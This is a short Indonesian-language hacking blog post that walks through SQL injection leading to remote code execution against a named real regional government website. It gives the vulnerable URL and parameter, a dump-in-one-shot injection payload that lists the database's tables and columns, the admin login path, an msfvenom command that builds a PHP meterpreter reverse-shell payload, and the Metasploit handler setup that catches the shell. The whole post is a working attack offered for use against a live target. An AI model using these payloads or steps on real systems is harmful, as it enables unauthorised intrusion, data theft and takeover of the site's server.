SQL Injection to RCE With Metasploit

YO what up bro.
di artikel kali ini saya akan share SQL Injection to RCE With Metasploit

vendor => http://skpd.pacitankab.go.id/home.php?idskpd=41

Dios => (select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)

admin login => skpd.pacitankab.go.id/aadmin

command buat bikin payload :

msfvenom -p php/meterpreter/reverse_tcp LHOST=IP LPORT=PORT R > namafile.php

command buat setting metasploit:

use exploit/multi/handler
set LHOST IP
set LPORT PORT
set payload php/meterpreter/reverse_tcp
exploit

untuk tutorialnya kalian bisa tonton video saya di bawah:

oke sekian artikel kali ini dan sampai bertemu di artikel selanjutnya.

Bagikan Artikel ini